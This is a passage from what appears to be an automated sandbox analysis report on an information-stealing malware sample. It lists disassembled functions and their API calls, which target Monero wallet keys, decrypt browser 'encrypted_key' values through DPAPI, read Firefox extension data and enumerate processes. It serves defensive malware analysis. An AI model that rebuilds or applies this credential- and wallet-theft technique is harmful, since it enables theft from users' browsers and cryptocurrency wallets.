Instruction Fuzzy Hash: 170136B5A40208BFDB00DFD0DC49FAEB7B8EB48701F0081A5FE05D7280D6709A158F95

Function 0025A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00D491F8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0025A0BD
LoadLibraryA.KERNEL32(00D4D780), ref: 0025A146

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A820: lstrlen.KERNEL32(00254F05,?,?,00254F05,00270DDE), ref: 0026A82B
Part of subcall function 0026A820: lstrcpy.KERNEL32(00270DDE,00000000), ref: 0026A885

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

SetEnvironmentVariableA.KERNEL32(00D491F8,00000000,00000000,?,002712D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00270AFE), ref: 0025A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0025A0B2, 0025A0C6, 0025A0DC

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: ece9970851ceee1a19ff0801aedcf1040b75b019409052e60e2bd7a2b19dbab4
Instruction ID: 7b27903c094e0d3f362be6d7bded277128e86344323fa2607c8de4dd72c35ee8
Opcode Fuzzy Hash: ece9970851ceee1a19ff0801aedcf1040b75b019409052e60e2bd7a2b19dbab4
Instruction Fuzzy Hash: 114151B1921104AFCB04DFA4ED86AAA37B4BB64301F54413AE945A32A0DB345D78CFDB

Function 0025A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 00268B60: GetSystemTime.KERNEL32(00270E1A,00D4A4E0,002705AE,?,?,002513F9,?,0000001A,00270E1A,00000000,?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 00268B86

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0025A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0025A3FF
lstrlen.KERNEL32(00000000), ref: 0025A6BC

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

DeleteFileA.KERNEL32(00000000), ref: 0025A743

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 4ab07a8c66543eb49e9e433fbcd569f6342121c8fd62cddc5154bded22a12c6c
Instruction ID: d09fe79bdb79356ba27dca67a4a8acea08d3ca4bd15004d20608a1c23f5cda34
Opcode Fuzzy Hash: 4ab07a8c66543eb49e9e433fbcd569f6342121c8fd62cddc5154bded22a12c6c
Instruction Fuzzy Hash: 28E1D2728201189ADB05FBA4DD96EEE7338AF54300F508169F51777091EF306AADCF66

Function 0025D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 00268B60: GetSystemTime.KERNEL32(00270E1A,00D4A4E0,002705AE,?,?,002513F9,?,0000001A,00270E1A,00000000,?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 00268B86

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0025D801
lstrlen.KERNEL32(00000000), ref: 0025D99F
lstrlen.KERNEL32(00000000), ref: 0025D9B3
DeleteFileA.KERNEL32(00000000), ref: 0025DA32

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9815d22155742d41ff499e869cc0bbb781b6f40ceb4645ab186dbef192a51d7e
Instruction ID: 86785393032fe31f14eb838771ac5899cf2a7d662bbc601d648fe3a89a531db8
Opcode Fuzzy Hash: 9815d22155742d41ff499e869cc0bbb781b6f40ceb4645ab186dbef192a51d7e
Instruction Fuzzy Hash: 9081B0729301089ADB04FBA4DD96DEE7338AF64300F504569F507B7091EF346AA9CFA6

Function 0025F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002599EC
Part of subcall function 002599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00259A11
Part of subcall function 002599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00259A31
Part of subcall function 002599C0: ReadFile.KERNEL32(000000FF,?,00000000,0025148F,00000000), ref: 00259A5A
Part of subcall function 002599C0: LocalFree.KERNEL32(0025148F), ref: 00259A90
Part of subcall function 002599C0: CloseHandle.KERNEL32(000000FF), ref: 00259A9A

Part of subcall function 00268E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00268E52

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00271580,00270D92), ref: 0025F54C
lstrlen.KERNEL32(00000000), ref: 0025F56B

Strings

moz-extension+++, xrefs: 0025F5AD
^userContextId=4294967295, xrefs: 0025F59C

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 06577edad4748b365ef509281c11d40539784db81d8a61f04a501153f73c1999
Instruction ID: 4e609d12257c0b446230c4f436509f2a6111b707521c5b3b29e85f3ac5d62ff6
Opcode Fuzzy Hash: 06577edad4748b365ef509281c11d40539784db81d8a61f04a501153f73c1999
Instruction Fuzzy Hash: 3F51F171D20108AADB04FFA4DC97DED7378AF54300F508529F91677191EE346A69CFA2

Function 002670D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0026718C
s&, xrefs: 002672AE, 00267179, 0026717C
s&, xrefs: 00267111

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: s&$s&$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-550088389
Opcode ID: f99899204b4e9eaee29d37c63a5625af4cd2b33534e6d93e38256acb6489b81a
Instruction ID: 71aae9c01eba3f5757c5fe16498fccf5cf12da3b30159c88998f9dcb13374bc2
Opcode Fuzzy Hash: f99899204b4e9eaee29d37c63a5625af4cd2b33534e6d93e38256acb6489b81a
Instruction Fuzzy Hash: 99517BB0D242199BDB14EFA0EC91BEEB374AF54308F1040A9E50976181EB746ED8CF59

Function 00259CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 002599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002599EC
Part of subcall function 002599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00259A11
Part of subcall function 002599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00259A31
Part of subcall function 002599C0: ReadFile.KERNEL32(000000FF,?,00000000,0025148F,00000000), ref: 00259A5A
Part of subcall function 002599C0: LocalFree.KERNEL32(0025148F), ref: 00259A90
Part of subcall function 002599C0: CloseHandle.KERNEL32(000000FF), ref: 00259A9A

Part of subcall function 00268E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00268E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00259D39

Part of subcall function 00259AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N%,00000000,00000000), ref: 00259AEF
Part of subcall function 00259AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00254EEE,00000000,?), ref: 00259B01
Part of subcall function 00259AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N%,00000000,00000000), ref: 00259B2A
Part of subcall function 00259AC0: LocalFree.KERNEL32(?,?,?,?,00254EEE,00000000,?), ref: 00259B3F

Part of subcall function 00259B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00259B84
Part of subcall function 00259B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00259BA3
Part of subcall function 00259B60: LocalFree.KERNEL32(?), ref: 00259BD3

Strings

DPAPI, xrefs: 00259D89
"encrypted_key":", xrefs: 00259D30
, xrefs: 00259DC1

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 8fb96c13f0e004edc442e52c8717663930351a993dfd901409c9615a159578cf
Instruction ID: a49e19e1bbed070fee9154651db5a5d4de9b0e0d948accd1e2aec6a1367bab8c
Opcode Fuzzy Hash: 8fb96c13f0e004edc442e52c8717663930351a993dfd901409c9615a159578cf
Instruction Fuzzy Hash: 373161B5D20109EBCF04EFE4DC85AEFB7B8AF48305F144559ED05A3241E7309A68CBA5

Function 00268680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002705B7), ref: 002686CA
Process32First.KERNEL32(?,00000128), ref: 002686DE
Process32Next.KERNEL32(?,00000128), ref: 002686F3

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

